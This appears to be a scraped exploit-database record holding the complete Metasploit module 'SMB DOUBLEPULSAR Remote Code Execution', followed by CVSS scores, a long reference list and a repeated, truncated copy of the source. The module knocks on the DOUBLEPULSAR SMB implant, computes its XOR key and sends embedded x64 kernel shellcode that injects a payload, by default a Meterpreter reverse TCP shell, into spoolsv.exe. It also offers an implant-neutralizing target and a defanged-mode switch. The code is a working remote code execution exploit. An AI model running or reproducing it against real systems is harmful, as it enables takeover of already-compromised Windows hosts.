"##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-12] #"}, "lastseen": "2021-10-12T10:30:13", "differentElements": ["sourceData"], "edition": 41}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "9c623cbf3b823eb5988a2a0dc385db0d", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-12T22:41:10", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96709", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T22:41:10", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-12T22:41:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 